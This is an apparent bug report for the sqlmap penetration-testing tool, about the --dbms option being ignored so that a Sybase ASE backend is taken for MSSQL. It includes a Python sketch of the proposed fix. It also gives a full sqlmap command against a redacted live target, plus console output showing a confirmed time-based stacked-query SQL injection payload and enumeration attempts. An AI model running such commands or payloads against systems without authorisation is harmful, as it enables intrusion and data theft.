What's the problem?
While the --dbms option limits the tests attempted to identify injection points, sqlmap may ignore it after identifying injection points and beginning enumeration.
Do you have an idea for a solution?
If the --dbms option is set, confirming the chosen DBMS should be attempted before other DBMSes, and ideally a warning should be issued if confirmation of the chosen DBMS fails.
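A sketch of the ordering the proposed solution asks for, written for this report as an illustration and not taken from sqlmap's own code. Handler names (`mssql`, `sybase`), the probe callbacks and the scenario data are constructed assumptions; the point it shows is that a forced DBMS is probed first and that any fallback to another handler is reported rather than silent.

```python
"""Added example (not sqlmap's code): DBMS confirmation that honours a forced --dbms.

Handler names, probe callbacks and scenario data are assumptions built for
this illustration.
"""
from typing import Callable, Dict, List, Optional, Tuple

# A probe returns True when the backend answers the way that DBMS would.
ConfirmFn = Callable[[], bool]


def ordered_candidates(handlers: List[str], forced: Optional[str]) -> List[str]:
    """Put the forced DBMS first; leave the remaining registration order untouched."""
    if not forced:
        return list(handlers)
    forced = forced.lower()
    head = [h for h in handlers if h.lower() == forced]
    tail = [h for h in handlers if h.lower() != forced]
    return head + tail


def detect_backend(probes: Dict[str, ConfirmFn],
                   forced: Optional[str]) -> Tuple[Optional[str], List[str]]:
    """Run confirmation probes in priority order.

    Returns (confirmed DBMS or None, list of warning strings). A warning is
    recorded when the forced DBMS has no handler, when its probe fails, and
    when a different DBMS ends up confirmed, so the override is visible to
    the user instead of silently replacing the value they asked for.
    """
    warnings: List[str] = []
    if forced and forced.lower() not in (h.lower() for h in probes):
        warnings.append(f"forced DBMS {forced!r} has no handler; using default order")
    for name in ordered_candidates(list(probes), forced):
        is_forced = bool(forced) and name.lower() == forced.lower()
        if probes[name]():
            if forced and not is_forced:
                warnings.append(f"confirmed {name!r} instead of forced DBMS {forced!r}")
            return name, warnings
        if is_forced:
            warnings.append(f"confirmation of forced DBMS {forced!r} failed; trying other handlers")
    return None, warnings


# Constructed scenario mirroring the report: both probes succeed because the
# backend accepts the same time-delay syntax for both DBMSes, and the MSSQL
# handler is registered before the Sybase one.
AMBIGUOUS_PROBES: Dict[str, ConfirmFn] = {
    "mssql": lambda: True,
    "sybase": lambda: True,
}

# Constructed scenario where the user's guess is wrong: only the MSSQL probe
# confirms, so the forced Sybase probe fails and a warning is raised.
MSSQL_ONLY_PROBES: Dict[str, ConfirmFn] = {
    "mssql": lambda: True,
    "sybase": lambda: False,
}


def run_scenarios() -> Dict[str, Tuple[Optional[str], List[str]]]:
    """Exercise the four cases a --dbms implementation has to get right."""
    return {
        "no_dbms_flag": detect_backend(AMBIGUOUS_PROBES, None),
        "forced_sybase": detect_backend(AMBIGUOUS_PROBES, "sybase"),
        "forced_wrong": detect_backend(MSSQL_ONLY_PROBES, "sybase"),
        "forced_unknown": detect_backend(AMBIGUOUS_PROBES, "oracle"),
    }


if __name__ == "__main__":
    for label, (dbms, warns) in run_scenarios().items():
        print(f"{label}: {dbms}")
        for w in warns:
            print(f"  [WARNING] {w}")
```

With the ambiguous probes, omitting `--dbms` still yields `mssql` (registration order wins, as in the log above), while `--dbms=sybase` yields `sybase` because the forced handler is probed first; only when the forced probe actually fails does the loop fall through to the other handlers, and it says so.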
How can we reproduce the issue?
The following command was run against a vulnerable web application with a Sybase ASE backend database, and sqlmap determined the backend database was MSSQL:
./sqlmap.py -u 'https://XXX/XXX/XXX.asp' --data='search_string=test' --dbms=sybase --risk=2 --level=2 --technique=S -a
What are the running context details?
- Installation method: git clone
- Client OS: Kali Rolling
- Program version: 1.1.7.27#dev
- Target DBMS: Adaptive Server Enterprise/15.0.2/EBF 15679 ESD#5/P/Sun_svr4/OS 5.8/ase1502/2528/64-bit/FBO/Tue Jun 17 17:24:07 2008
- Detected WAF/IDS/IPS protection: None
- SQLi techniques found by sqlmap: Microsoft SQL Server/Sybase stacked queries (comment)
- Results of manual target assessment: Removing plugins/dbms/mssqlserver and references to the same in lib/controller/handler.py allowed exploitation of the backend ASE database
- Relevant console output (if any):
[15:47:35] [INFO] testing connection to the target URL
[15:47:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:47:35] [WARNING] heuristic (basic) test shows that POST parameter 'search_string' might not be injectable
[15:47:35] [INFO] testing for SQL injection on POST parameter 'search_string'
[15:47:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:47:35] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:47:47] [INFO] POST parameter 'search_string' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (2) and risk (2) values? [Y/n] n
[15:47:52] [INFO] checking if the injection point on POST parameter 'search_string' is a false positive
POST parameter 'search_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: search_string (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: search_string=test';WAITFOR DELAY '0:0:5'--
---
[15:48:21] [INFO] testing Microsoft SQL Server
[15:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:48:29] [INFO] confirming Microsoft SQL Server
[15:48:30] [INFO] the back-end DBMS is Microsoft SQL Server
[15:48:30] [INFO] fetching banner
[15:48:30] [INFO] retrieved:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server Unknown
[15:48:30] [INFO] fetching banner
[15:48:30] [INFO] retrieved:
[15:48:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None
[15:48:30] [INFO] fetching current user
[15:48:30] [INFO] retrieved:
current user: None
[15:48:30] [INFO] fetching current database
[15:48:30] [INFO] retrieved:
current database: None
[15:48:31] [INFO] fetching server hostname
[15:48:31] [INFO] retrieved:
hostname: None
[15:48:31] [INFO] testing if current user is DBA
current user is DBA: False
[15:48:31] [INFO] fetching database users
[15:48:31] [INFO] fetching number of database users
[15:48:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:48:32] [CRITICAL] unable to retrieve the number of database users
[15:48:32] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 62 times
[*] shutting down at 15:48:32